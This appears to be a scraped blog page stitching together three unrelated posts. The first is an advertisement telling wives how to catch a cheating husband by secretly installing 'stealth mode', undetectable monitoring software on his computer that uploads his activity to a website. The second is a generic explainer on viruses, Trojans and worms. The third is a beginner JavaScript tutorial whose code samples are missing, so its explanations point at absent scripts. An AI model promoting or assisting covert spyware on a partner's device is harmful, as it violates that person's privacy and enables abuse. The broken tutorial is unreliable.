For most parts, the Internet is a very useful tool that serves many noble purposes. But the Internet can also be used in not so rightful ways. With the myriad of web applications that allow people to reach out to other people, it is probably inevitable that some married men (and women) will use it to hook up with other individuals. If you want to know how to find out what website your husband is visiting online, then you ve come to the right place. Here you will find the ways to tell what sites your husband regular surfs to meet women.

Of course, you can always sneak up on your husband s computer when he is not around and check the history log of the browser that he is using. There you will find out what websites he has visited as well as the date and time when he accessed the sites. The only downside to this method is that it is very risky. If your husband is really doing something behind your back then he is probably very careful about leaving evidences that other people, especially you, might see.

If he is the thorough kind – and almost all cheating husbands are – then he probably clears the history list of his web browser so not to leave any signs and he has also most likely protected his computer with a password so you or anyone who will try to access it for that matter will have a hard time getting in.

When you get caught then that is another story altogether and a whole new mess. If your husband finds out that you are on his tail, then he will be more careful next time about hiding his tracks. When he does that, then it will be harder for you to catch him.

If you want to know how to find out what website your husband is visiting online, then you must know that there is an easier and more effective way for you to do this than physically snooping around your husband s PC and that is through the help of moder technology. There is a computer software that will allow you to find out all of of your husband s computer and Internet activities without even touching his computer.

All you need to do is install the program on his computer once and that s it. The program logs your husbands activities and then uploads it to a website from which you can retrieve it. You don t have to worry about your husband finding out about this program because it works on stealth mode which means it is completely undetectable.
Do you want to find out more about this software, do you want to find out what websites your husband is visiting online visit us NOW!http://www.catchcheating.net/find_out_what_websites_your_husband_is_visiting.htmlVerny L is the owner of http://www.catchcheating.net we will help you catch your husband


virus

Posted by hang on , under | comments (0)




virus
Most viruses are written with a malicious intent, so that they can cause damage toprograms and data in addition to spreading themselves. Viruses infect existing programsto alter the behavior of programs, actively destroy data, and perform actions on storage devices that render their stored data inaccessible.
Computer viruses attack the software of acomputer such as operating systems, data files, application software, and e-mails. However, viruses do not affect the computerhardware.
Viruses infect computers and spread themselves using various methods. Some viruses attach themselves to a common program such as a popular game or word processor. When a person downloads the infected game and runs it, the attached virus program gets executed. The virus then loads itself into memory and searches for any other program on the disk. If thevirus finds any program, it modifies the program by adding the malicious code to the program. The next time this program gets executed, it infects other programs, and the cycle continues thereafter.
There are many types of computer viruses such as a boot-sector virus, macro virus, e-mail virus, etc.
A boot-sector virus infects the boot record on hard disks and floppy disks, which is used to start thecomputer. When the computer is turned on or restarted, the virus is automatically executed. An infected boot disk may stop the computer from starting up.
A macro virus is a macro or script that attaches itself to a file or template. When the file is loaded, the instructions of the macro or script are executed.
An e-mail virus moves around in e-mail messages, and usually replicates itself by automatically mailing itself to many people in the their e-mail address book.
Some other types of programs are also harmful to computers, which are not viruses such as a Trojan horse.
The main difference between a virus and a Trojan horse program is that a Trojan horse program does not replicate itself. A Trojan horse only destroys information on the hard disk. A Trojan horse program disguises itself as a legitimate program such as a game or utility. It often looks and initially acts in the same way as a legitimate program, but when it is executed, it destroys or corrupts data. A Trojan horse program can contain viruses, but it is not a virus itself.
A Worm uses computer networks and security holes to replicate itself. A Worm scans the network for another computer that has a specific security hole. It copies itself to the new computer using the security hole, and then starts replicating from there as well. A virus can have both virus and worm characteristics.
There are several anti-virus software that can detect, identify, and remove these viruses. As a precaution against viruses, we should take the following actions:
An anti-virus software that can detect, identify, and remove viruses should be installed on the computer.
All information downloaded from the Internet or some unknown resource must be immediately scanned for viruses by using an anti-virus software.
Any e-mail attachment that comes from unknown sources should never be opened.

About the Author:
uCertify was formed in 1996 with an aim to offer high quality educational training software and services in the field of information technology to its customers. uCertify provides exam preparation solutions for thecertification exams of Microsoft, CIW, CompTIA, Oracle, Sun and other leading IT vendors. To know more about uCertify, please visit http://www.ucertify.com/



JavaScript code tips

Posted by hang on , under | comments (0)




JavaScript Tutorial: An Introduction to JavaScript

Introduction


JavaScript is a programming language that was designed for the web. Many people don't understand that JavaScript is not the same as Java, the programming language. In fact, Java and JavaScript couldn't be more different. Java is very complicated, JavaScript is not. Regardless of popular belief, JavaScript is not a condensed version of Java in any way. One has nothing to do with the other.

JavaScript can be used to manipulate your webpages to perform a variety of functions. Some of the applications are purely functional, while others are just fun. In fact, you don't have to know any JavaScript at all, because there are numerous scripts out there that you can simply grab and paste into your HTML code.

But at the same time, if you want the JavaScript to be effective, and to do what you want it to do, you do need to at least have a basic understanding of JavaScript, how it is written, and how it works. This tutorial will provide that information for you, starting with the very basics, and then working into a few advanced topics. A working knowledge of the basics is necessary.

You do not, however, need to know HTML to learn JavaScript. It does help, but it isn't necessary since JavaScript doesn't use HTML, even though it is used with HTML. You do need to know how to work with your HTML documents, however, because you will be pasting your scripts into the HTML code, and you will need to know where to place the JavaScript. You do not need to know any programming language to learn JavaScript. The entire concept and writing of JavaScript is really quite simple.



What Can I Do With JavaScript?


As stated earlier, you can use JavaScript to perform a variety of functions on your website. Some of the functions are just functional, while the others are more fun in nature, providing interactivity for your website visitors.

Face it. Nobody likes stale webpages that just sit there. They want to interact with them dynamically. JavaScript allows this to happen. JavaScript reacts to users actions in most cases. For instance, if the user moves their mouse over some text or a graphic, JavaScript can perform a rollover and make that graphic or text change to something else.

JavaScript can provide functionality, such as password protection, browser detection, or display information, such as the correct time and date on a webpage. JavaScript can be used to give the website designer more control over a user's browser, and how that browser sees the webpages. There are literally millions of things one can do with JavaScript.



What Do I Need To Write JavaScript?


Your own web browser must support JavaScript. If it doesn't, you won't be able to tell if your scripts work. Newer versions of both Microsoft Internet Explorer and Netscape both support JavaScript.

You can write your JavaScript using any plain text editor, or you can write them directly into your HTML documents. It is of course better to use a plain text editor so that you don't accidentally mess up any of your HTML coding. An example of a plain text editor is Microsoft's Notepad.

The only other thing that is required to write JavaScript is a working knowledge of JavaScript, which you will have as you work through this tutorial!



 The Basics of JavaScript

There are many terms that you will have to learn when it comes to JavaScript. However, you don't have to learn them right now, before you do any scripting. It is easier to learn the terms as you go along, as this will give you a greater understanding of them. So, we will not be throwing terms out there to confuse or frighten you. However, there are terms that you will need to know - and will come to know - and they need to be noted before you can go any further.

With that said, the first thing you need to know is that JavaScript 'thinks' in terms of objects. DOM, which stands for Document Object Model is the foundation of JavaScript. Don't panic. Just focus on the word object. You know what an object is. It's a thing. Your computer is an object. Your desk is an object. Let's look into the computer screen, and you will see other objects. A browser window is an object. A web page is a document, and a document is an object. A graphic on a web page is an object.

As you can see, many objects contain other objects. For instance, the desk contains the computer, which contains the web browser window, which contains the web page, which contains the graphics.

Now, each object has properties. For instance, a web page has a background color, and it uses a certain font. These are properties. But, the background color could also be considered an object, with the property being the actual color. Don't feel confused. For now, all you need to know is that there are objects and objects have properties.

JavaScripts cause actions to occur on or with objects. These actions are called methods. These methods may be referred to as functions. Functions are methods that you set up to perform a certain task. Method and Function are pretty much interchangeable in this way.

There are just a few more terms to note. Don't run away! In JavaScript, we also have events, and event handlers. An event is something that happens. In the world of JavaScript, an event is usually something that the website visitor did, such as moving their mouse over a link. That is an event. An event handler comes into play when the event occurs. The event occurs and the event handler calls a JavaScript or reaction into play.

You will learn some other important terms as you go along. Remember, you don't have to cram all of this into your head right now. These are the basic terms that relate to JavaScript, and you will get to know them as you move forward in this tutorial.

So, let's move forward and write our first JavaScript.

Open your NotePad or favorite text editor, and let's get started. The first thing you are going to learn is how to make JavaScript write something to your HTML document. Within your text editor, write or copy and paste the following script:



This script will write the words, HI Everybody on your webpage. Now, this is a very simple script, and you can use HTML to write words on your page, but the basis of this script will be very important later on, so it is important to learn this one. Let's look at each element of the script.

First, we are telling the web browser that it is about to see and interpret JavaScript with this tag:




Congratulations! You've written your first JavaScript, and it is the basis for so many other wonderful things that can be done with JavaScript. Be sure that you paste this code into an HTML document, and load it up to your web server so you can see how it works.


As stated in the previous lesson, if a user's browser is not JavaScript enabled, the script can't run. Often, nothing will happen, but it is possible that the user will get error reports. This can be prevented by using the


So far, you have learned about objects, methods, and strings. You have learned how to write a very basic JavaScript, and you have learned how to hide JavaScript from old browsers, and how to handle browsers that do not have JavaScript enabled. Let's take a closer look at events now.


JavaScript Events

An event is something that happens. Events in JavaScript usually happen when a website visitor, or user, does something. It may be something as simple as moving the mouse. When events happen, Event Handlers react to the events. For instance, when you click a link on a web page, an event handler takes you to the link that has been specified.

Event handlers often use variables and methods to perform the task that they have been told to do. Event handlers are assigned to objects in the HTML code. In our example above, there was no event. The words appeared on the web page when it was loaded. The user didn't have to take any action, other than arriving on the web page.

Let's write another JavaScript. This will be an event:


Home


Now this script will change the status bar of the browser window when the user puts their mouse over the link on the page. Let's look at the elements.

First, we designate the URL, which is http://www.yourwebpage.com, and we use common HTML for this, so that the code looks like:


Home




Another user driven event handler is onClick. Just as it sounds, this event handler wakes up and starts doing things when a user clicks on a specified object. Aside from learning about the onClick event handler, you are also about to learn how to generate a button to go along with it. Here is the code:



We have a new element here - a button tag. When the button is clicked (event), the onClick (event handler) will create an alert box (object) which will say Life is good (string). We've made sure the button will simply say Click It! Now, note that we've said that the alert box is an object. It is - but so is window. In this case, the window is an object, and alert is both a method and an object.

By now, these JavaScript terms should be coming to you more easily, and you should be able to recognize some of them for what they are in the code. Let's learn a new term, which is unLoad. This is an event handler, and the event is when a page is closed, or left by the user. When the web page unloads in the browser window, something will be triggered. This is often used to open popup windows and such.

Other common event handlers are onBlur, onFocus, onSelect, and onChange. These event handlers are usually used with HTML forms, such as forms that users fill out on your website.

Let's first look at onFocus and onBlur. When a user interacts with a web page, the browser that is displaying that page focuses on what the user is doing. Users interact with web pages by using the mouse. When a user clicks a link, that link has the web browsers focus.

Look at it this way: A user comes to your page. They type something into a form on your page. That form's input box has the focus of the browser. The user hits the submit button for that form. The input box loses focus, and this is called onBlur in JavaScript terms. The focus is now on the button, which is onFocus.

The event handler onChange comes into action when the user changes something on the page, such as the text in an input box. The other event handler, onSelect, comes to life when the user selects something. For instance, they might select an option with a radio button.

There are numerous other event handlers that can be used to increase the Interactivity of a user with a web page. For instance, if you have an image of a button on your webpage, you can use the onClick event handler with the mouseDown and mouseUp event handlers. This combination will make a graphic appear to be depressed when someone clicks the mouse down on it, and rise back up when they release the mouse button.

You will see how all of these event handlers are used later on, and you will learn about some additional event handlers as well. Now that you know more about event handlers, let's move on to the next topic, which is a variable.